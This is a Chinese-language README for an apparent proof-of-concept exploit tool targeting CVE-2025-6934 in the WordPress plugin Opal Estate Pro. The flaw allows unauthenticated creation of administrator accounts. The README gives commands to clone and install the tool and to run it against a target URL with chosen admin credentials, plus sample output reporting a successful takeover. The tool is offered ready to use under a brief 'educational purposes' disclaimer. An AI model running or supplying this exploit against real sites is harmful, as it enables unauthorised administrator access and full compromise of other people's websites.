📖 描述
此仓库包含 CVE-2025-6934 的 漏洞验证 (PoC) 利用代码,
该漏洞是 WordPress 插件:Opal Estate Pro <= 1.7.5 中的一个严重漏洞,允许 无需身份验证即可创建管理员账户。
⚠️ 免责声明:此工具仅供 教育及安全研究目的 使用。
作者 不承担 因滥用或造成的任何损害的责任。
readme.txt 检测插件版本克隆仓库并安装依赖:
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
使用目标运行脚本:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ 示例输出:
[✔] 漏洞利用成功!
用户名 : newadmin
邮箱 : [email protected]
密码 : MySecurePass123
角色 : administrator
漏洞利用截图
Cyberlone Indonesia (Cyberlone)
本项目基于 MIT 许可证 授权 – 详见 LICENSE 文件。